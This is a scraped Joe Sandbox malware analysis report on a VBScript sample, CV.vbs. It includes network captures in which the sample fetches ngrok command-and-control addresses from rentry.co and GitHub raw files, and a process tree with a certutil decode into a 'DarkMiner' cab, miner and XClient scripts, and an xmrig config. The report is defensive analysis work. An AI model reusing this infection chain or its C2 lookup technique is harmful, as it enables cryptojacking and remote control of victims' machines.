class="col
2024-08-05 09:58:35 UTC	880	IN	Data Raw: 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 61 65 35 65 64 66 36 31 39 30 36 34 33 35 37 27 2c 74 3a 27 4d 54 63 79 4d 6a 67 31 4d 54 6b 78 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 61 2e 6e 6f 6e 63 65 3d 27 27 3b 61 2e 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 Data Ascii: cument;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ae5edf619064357',t:'MTcyMjg1MTkxNS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getEleme
2024-08-05 09:58:35 UTC	6	IN	Data Raw: 31 0d 0a 0a 0d 0a Data Ascii: 1
2024-08-05 09:58:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:58:35 UTC	140	OUT	GET /zsbkz/raw%EBH%02 HTTP/1.1 Host: rentry.co User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:58:36 UTC	662	IN	HTTP/1.1 404 Not Found Date: Mon, 05 Aug 2024 09:58:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Origin x-xss-protection: 1; mode=block strict-transport-security: max-age=31536000; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3rrlWVqyvOTIp7w4iwGRKZ%2F5PHCDvpkwL3SHeIjOYmyLgXle7jDVB%2B%2Fh7QmdUR2yNEClpcPMbJ7CJpD6TAchBJ5uOkL%2Fos7JPwzpMPr2%2F9jdNL3VDCmW%2FOZHRg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ae5edfa883e42f2-EWR
2024-08-05 09:58:36 UTC	707	IN	Data Raw: 31 30 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 10e1<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" content=
2024-08-05 09:58:36 UTC	1369	IN	Data Raw: 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta
2024-08-05 09:58:36 UTC	1369	IN	Data Raw: 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6e 6f 2d 67 75 74 74 65 72 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d Data Ascii: = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0"> <div class="container container-smooth"> <div class="row no-gutters"> <div class=
2024-08-05 09:58:36 UTC	884	IN	Data Raw: 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 61 65 35 65 64 66 61 38 38 33 65 34 32 66 32 27 2c 74 3a 27 4d 54 63 79 4d 6a 67 31 4d 54 6b 78 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 61 2e 6e 6f 6e 63 65 3d 27 27 3b 61 2e 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 Data Ascii: w.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ae5edfa883e42f2',t:'MTcyMjg1MTkxNi4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getE
2024-08-05 09:58:36 UTC	6	IN	Data Raw: 31 0d 0a 0a 0d 0a Data Ascii: 1
2024-08-05 09:58:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:58:40 UTC	179	OUT	GET /DevilBot000/Client_IP_PORT/main/IP_PORT HTTP/1.1 Host: raw.githubusercontent.com User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:58:40 UTC	893	IN	HTTP/1.1 200 OK Connection: close Content-Length: 24 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "b582075db8192cfa28b53b677d81049ea870e54b39972b2026d92429dad956d1" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 2699:2FE44C:11B2FA8:13F824B:66B0A24B Accept-Ranges: bytes Date: Mon, 05 Aug 2024 09:58:40 GMT Via: 1.1 varnish X-Served-By: cache-ewr18180-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1722851921.900707,VS0,VE54 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: ab60537930d7e3383511bbbbb22cc2bb975290d2 Expires: Mon, 05 Aug 2024 10:03:40 GMT Source-Age: 0
2024-08-05 09:58:40 UTC	24	IN	Data Raw: 30 2e 74 63 70 2e 69 6e 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 37 33 30 39 0a Data Ascii: 0.tcp.in.ngrok.io:17309

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:58:49 UTC	133	OUT	GET /zsbkz/raw HTTP/1.1 Host: rentry.co User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:58:49 UTC	704	IN	HTTP/1.1 200 OK Date: Mon, 05 Aug 2024 09:58:49 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 23 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLMDKLsb3C2%2BtthNqMaIaF7dCV1m%2BGAXoCM7CU6darHOmKkfj6XfbNa0vv%2B0NsAPaxg%2BjKPUCHJ8Kh%2Fwe4eWB%2B7MpuGOU%2BEkofScgk4ffpruoFv22mGG2QPj4Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ae5ee4d2b67433a-EWR
2024-08-05 09:58:49 UTC	23	IN	Data Raw: 30 2e 74 63 70 2e 69 6e 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 37 34 31 Data Ascii: 0.tcp.in.ngrok.io:11741

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:58:56 UTC	133	OUT	GET /zsbkz/raw HTTP/1.1 Host: rentry.co User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:58:56 UTC	704	IN	HTTP/1.1 200 OK Date: Mon, 05 Aug 2024 09:58:56 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 23 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HmZL5DaqhWHYcs8rks%2FPjoKm7Xd%2BVXlpGH8%2BcahKCZE%2BCusMbCweVpX4lhHquFu8rJ0E4OeMRrwTjNlJN7Ys%2FrXbTXmB8jC9PkApH%2Btzw%2BkRbfKV5Q6si8pp5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ae5ee7b5df57d18-EWR
2024-08-05 09:58:56 UTC	23	IN	Data Raw: 30 2e 74 63 70 2e 69 6e 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 37 34 31 Data Ascii: 0.tcp.in.ngrok.io:11741

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:59:04 UTC	133	OUT	GET /zsbkz/raw HTTP/1.1 Host: rentry.co User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:59:04 UTC	702	IN	HTTP/1.1 200 OK Date: Mon, 05 Aug 2024 09:59:04 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 23 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2FlpE58OCvqg0MhYz20qb7Gj4NiyuY3FtQuNXAaOrNuCCuTtlutmh%2BkEMhXISF60%2BfhT7I4%2FzgxDN7C4q5Uz%2FjRqAi3fjCq3jp5ZcNothrA8Pj%2Fr0%2F6uV6qAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ae5eeaaa8dc5e86-EWR
2024-08-05 09:59:04 UTC	23	IN	Data Raw: 30 2e 74 63 70 2e 69 6e 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 37 34 31 Data Ascii: 0.tcp.in.ngrok.io:11741

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:59:12 UTC	143	OUT	GET /zsbkz/raw%C3%ABH%02 HTTP/1.1 Host: rentry.co User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:59:13 UTC	662	IN	HTTP/1.1 404 Not Found Date: Mon, 05 Aug 2024 09:59:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Origin x-xss-protection: 1; mode=block strict-transport-security: max-age=31536000; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SNYdLSPUbQk6%2B2wwLHZblPYIO3Sut4rZuz%2F7tlIg98Tb6uKPNAvXI7PQ2Z1zF7CVCvFBvhXx2%2FuPZOzAQfCFvim%2FKtQOt2S9gG31kf%2FnUEt%2BIQ7VFTOKjWqbmg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ae5eee069321849-EWR
2024-08-05 09:59:13 UTC	707	IN	Data Raw: 31 30 65 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 10e2<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" content=
2024-08-05 09:59:13 UTC	1369	IN	Data Raw: 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta
2024-08-05 09:59:13 UTC	1369	IN	Data Raw: 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6e 6f 2d 67 75 74 74 65 72 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d Data Ascii: = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0"> <div class="container container-smooth"> <div class="row no-gutters"> <div class=
2024-08-05 09:59:13 UTC	885	IN	Data Raw: 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 61 65 35 65 65 65 30 36 39 33 32 31 38 34 39 27 2c 74 3a 27 4d 54 63 79 4d 6a 67 31 4d 54 6b 31 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 61 2e 6e 6f 6e 63 65 3d 27 27 3b 61 2e 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 Data Ascii: w.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ae5eee069321849',t:'MTcyMjg1MTk1My4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getE
2024-08-05 09:59:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:59:19 UTC	179	OUT	GET /DevilBot000/Client_IP_PORT/main/IP_PORT HTTP/1.1 Host: raw.githubusercontent.com User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:59:19 UTC	898	IN	HTTP/1.1 200 OK Connection: close Content-Length: 24 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "b582075db8192cfa28b53b677d81049ea870e54b39972b2026d92429dad956d1" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: EA88:27BAEB:8186E0:917D28:66B0A275 Accept-Ranges: bytes Date: Mon, 05 Aug 2024 09:59:19 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890025-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1722851959.496912,VS0,VE53 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 3ccb147ab1f3bf06e1229433dee8884024ec2ebe Expires: Mon, 05 Aug 2024 10:04:19 GMT Source-Age: 0
2024-08-05 09:59:19 UTC	24	IN	Data Raw: 30 2e 74 63 70 2e 69 6e 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 37 33 30 39 0a Data Ascii: 0.tcp.in.ngrok.io:17309

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CV.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\.xmrig.json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\q64New[1].encode

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\CSC34AD3A053BD0482B8F57CF2F2153CA.TMP

C:\Users\user\AppData\Local\Temp\CSC42213DD479FE494FA8153260D2C4A5B2.TMP

C:\Users\user\AppData\Local\Temp\CSC553B895C4F294EC7A377E88EC4917E34.TMP

C:\Users\user\AppData\Local\Temp\CSC591B9E4DE1824FC8AB2EAE3EE41D29C1.TMP

C:\Users\user\AppData\Local\Temp\CSC698B17CA485A4DF3BFC9C5C4DCCE15E7.TMP

C:\Users\user\AppData\Local\Temp\DLL120A.tmp

C:\Users\user\AppData\Local\Temp\DLL39F2.tmp

C:\Users\user\AppData\Local\Temp\DLL46B0.tmp

Windows Analysis Report
CV.vbs

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:59:26 UTC	133	OUT	GET /zsbkz/raw HTTP/1.1 Host: rentry.co User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:59:26 UTC	698	IN	HTTP/1.1 200 OK Date: Mon, 05 Aug 2024 09:59:26 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 23 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gcBRE263SLWMHiHMTRaTClVfL8TSN8kgMOvDa6uSk3jb6s2IjKs4VLpccu%2BjF%2FsyFYHKviy0UrbQ5uZX0EaKw9i3FLrhaWzZk6yw9Zvul2x0AR4%2BclgtMs%2BrTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ae5ef3709d4430d-EWR
2024-08-05 09:59:26 UTC	23	IN	Data Raw: 30 2e 74 63 70 2e 69 6e 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 37 34 31 Data Ascii: 0.tcp.in.ngrok.io:11741

Target ID:	0
Start time:	05:57:18
Start date:	05/08/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CV.vbs"
Imagebase:	0x7ff6697c0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	1
Start time:	05:57:21
Start date:	05/08/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\certutil.exe" -decode C:\Users\user\AppData\Local\Temp\Encode.txt C:\miner\DarkMiner.cab
Imagebase:	0x7ff757690000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	5
Start time:	05:57:22
Start date:	05/08/2024
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cscript.exe" C:\miner\mine_start.vbs
Imagebase:	0x7ff7b3f00000
File size:	161'280 bytes
MD5 hash:	24590BF74BBBBFD7D7AC070F4E3C44FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	11
Start time:	05:57:25
Start date:	05/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ee3yyyau.cmdline"
Imagebase:	0x7ff710640000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	13
Start time:	05:57:33
Start date:	05/08/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\miner\mine_start.vbs"
Imagebase:	0x7ff6697c0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	14
Start time:	05:57:34
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c c:\miner\XClient.bat
Imagebase:	0x7ff70b6b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	18
Start time:	05:57:35
Start date:	05/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\weizmren.cmdline"
Imagebase:	0x7ff710640000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	21
Start time:	05:57:41
Start date:	05/08/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
